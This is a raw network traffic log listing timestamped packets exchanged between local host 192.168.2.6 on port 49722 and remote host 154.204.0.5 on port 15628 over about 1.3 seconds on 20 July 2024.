Jul 20, 2024 16:31:34.039679050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.044874907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.044928074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.049772978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.049864054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.054827929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.054897070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.060002089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.060060024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.065097094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.065352917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.070424080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.070532084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.075503111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.075566053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.080585957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.080682993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.085885048 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.085948944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.100785971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.100845098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.139189005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.164743900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.164872885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.170356035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.170438051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.179430008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.179513931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.185807943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.185877085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.194595098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.194694996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.201422930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.201493979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.206937075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.207001925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.213541031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.213606119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.219294071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.219383001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.225009918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.225117922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.231050014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.231138945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.237191916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.237267017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.243705034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.243783951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.248866081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.248929024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.254398108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.254451990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.259578943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.259777069 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.265405893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.265480042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.273085117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.273145914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.279267073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.279334068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.287843943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.287918091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.292917967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.292985916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.308300018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.308361053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.313304901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.313360929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.318871021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.318922997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.325530052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.325587034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.331666946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.331726074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.337213039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.337311983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.342236996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.342295885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.347673893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.347739935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.355686903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.355771065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.367923021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.368060112 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.373317957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.373377085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.379107952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.379173040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.384455919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.384546995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.389435053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.389763117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.394573927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.394628048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.399504900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.399568081 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.404505014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.404778957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.409784079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.409852028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.414706945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.414830923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.420195103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.420334101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.425465107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.425664902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.432169914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.432432890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.437774897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.437855005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.442997932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.443062067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.448586941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.449095964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.454118967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.454323053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.459161997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.459238052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.464597940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.464855909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.470086098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.470146894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.475058079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.475136995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.480014086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.480873108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.486006021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.486768961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.492049932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.492312908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.499629974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.500380993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.506907940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.507817984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.513256073 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.513792038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.518954039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.519222021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.524765968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.524918079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.530894995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.532864094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.540978909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.541199923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.564960003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.565059900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.577841997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.578265905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.587647915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.587812901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.612478018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.612667084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.642328978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.642565966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.649396896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.649530888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.679711103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.685501099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.686058044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.702637911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.702815056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.715295076 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.715596914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.736799002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.737564087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.763411999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.789865017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.805125952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.805445910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.811402082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.813653946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.818753004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.818985939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.824043989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.824482918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.829941988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.830213070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.835618019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.835789919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.844742060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.844918966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.851478100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.851735115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.859539986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.863617897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.870186090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.870431900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.877254963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.877742052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.883900881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.884222031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.889200926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.889436007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.894341946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.894733906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.899739027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.899945021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.905395985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.905849934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.910896063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.911274910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.916765928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.917243004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.923650026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.924078941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.942142963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.942414999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.947371006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.948008060 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.957623005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.957981110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.968353987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.968523979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.973604918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.973767042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.980031967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.980600119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.987546921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.988504887 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.994046926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.994386911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:34.999531984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:34.999773979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.004923105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.005536079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.012093067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.012478113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.019586086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.019731998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.026487112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.026832104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.031913042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.032902002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.045265913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.045569897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.050894976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.051120996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.056083918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.056365013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.061301947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.061619043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.066716909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.067174911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.072067976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.072506905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.077513933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.078210115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.084103107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.084604979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.091125011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.091444969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.097410917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.098591089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.106493950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.107897997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.114269018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.115344048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.126322985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.127149105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.154764891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.155838966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.165075064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.165318966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.171196938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.171454906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.176687956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.177393913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.189603090 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.189816952 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.195444107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.195631027 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.206537008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.207356930 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.212980032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.213414907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.221005917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.221307993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.226363897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.226638079 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.233767033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.234102964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.243102074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.243607998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.249057055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.249475002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.258018017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.258284092 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.263391972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.264096022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.270150900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.270260096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.275561094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.275707006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.281048059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.281147957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.286046028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.286129951 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.291085958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.291214943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.299011946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.299237013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.308425903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.312654018 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.317652941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.317928076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.328804970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.329188108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.334208012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.334290028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.339473963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.339579105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.346029043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.346211910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.353439093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.353564024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.358700037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.358817101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.363853931 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.363934994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.369137049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.369220972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.374468088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.374541998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.380183935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:35.380264044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:35.385202885 CEST	15628	49722	154.204.0.5	192.168.2.6
